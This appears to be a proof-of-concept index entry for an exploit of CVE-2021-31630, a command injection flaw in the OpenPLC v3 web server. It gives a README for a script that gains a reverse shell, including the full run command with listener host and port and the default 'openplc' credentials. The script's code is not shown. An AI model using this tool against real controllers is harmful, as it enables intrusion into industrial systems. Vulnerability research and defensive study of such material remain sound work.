POC details: 529ed0423b109c168532b4894ab8e730b68d71fb

Source
Related vulnerability
Title: OpenPLC code injection vulnerability (CVE-2021-31630)
Description: OpenPLC is an open-source programmable logic controller that provides low-cost industrial solutions for automation and research. OpenPLC v3 has a code injection vulnerability, which stems from the Hardware Layer Code Box component on the /hardware page of the product's web service failing to filter special characters in its input. An attacker can exploit this vulnerability to execute system commands.
Description
This is an automation of CVE-2021-31630 exploitation.
Introduction
This script automatically exploits a vulnerability in OpenPLC Web Server v3.

You will be able to obtain an automatic reverse shell from the server without having to use manual techniques.

CVE-2021-31630 Detail
Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.

*The script was customized so that, after completing the script registration in OpenPLC, it spawns the machine's shell in the same terminal.*

Use the commands below (we recommend creating a Python virtual environment to install the dependencies). Note, however, that the breakerplc.py script must be executed outside the virtual environment.
```
sudo apt update
pip3 install requests
```
How to use: you can use the command line below.

```
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
```
```
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         Target URL with http(s)://

options:
  -h, --help  show this help message and exit
  -u U        Username
  -p P        Password
  -t T        Request Timeout, increase if server is slow
  -lh LH      LHOST
  -lp LP      LPORT
```
![2024-06-21 19-53-25](https://github.com/adibabdala123/cve-2021-31630/assets/76139191/74cc2df6-17bf-4488-9e44-9c3c39ec6d80)

**IMPORTANT**
After connecting, you need to type "whoami" or "ls" to break the line of code and get the shell back.
![image](https://github.com/adibabdala123/cve-2021-31630/assets/76139191/b2176031-1b05-4fd5-b975-2fc6a18ede5e)


File snapshot

```
[4.0K] /data/pocs/529ed0423b109c168532b4894ab8e730b68d71fb
├── [7.0K] breakerplc.py
└── [1.6K] README.md

0 directories, 2 files
```